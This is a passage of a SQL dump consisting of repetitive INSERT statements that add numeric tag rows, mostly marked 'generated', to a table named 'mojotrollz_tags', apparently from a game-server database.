`table`, `type`, `value`, `comment`) VALUES (2810, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2810, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2812, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2814, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2814, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2816, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2817, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2818, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2818, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2819, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2820, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2820, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2821, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2829, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2829, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2830, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2830, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2831, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2831, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2832, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2832, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2834, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2834, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2835, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2835, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2836, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2837, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2838, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2838, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2839, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2839, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2840, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2842, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2844, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2845, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2847, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2848, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2849, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2849, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2850, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2850, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2851, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2851, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2852, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2852, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2853, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2855, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2858, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2858, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2859, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2859, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2860, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2861, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2870, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2870, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2878, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2879, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2888, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2892, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2892, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2893, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2894, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2906, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2906, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2907, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2908, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2909, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2910, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2910, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2911, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2912, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2913, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2914, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2916, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2917, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2918, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2920, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2921, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2922, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2923, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2924, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2925, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2926, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2927, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2928, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2929, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2929, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2930, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2930, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2931, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2931, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2932, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2932, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2937, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2941, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2941, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2943, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2944, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2945, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2947, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2947, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2948, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2949, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2949, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2950, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2951, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2952, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2953, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2954, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2955, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2958, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2959, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2960, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2961, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2962, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2963, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2964, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2964, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2965, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2966, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2966, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2967, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2967, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2968, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2968, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2969, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2969, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2970, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2970, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2971, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2971, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2972, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2972, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2973, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2973, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2974, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2974, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2975, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2975, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2976, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2977, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2978, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2979, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2980, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 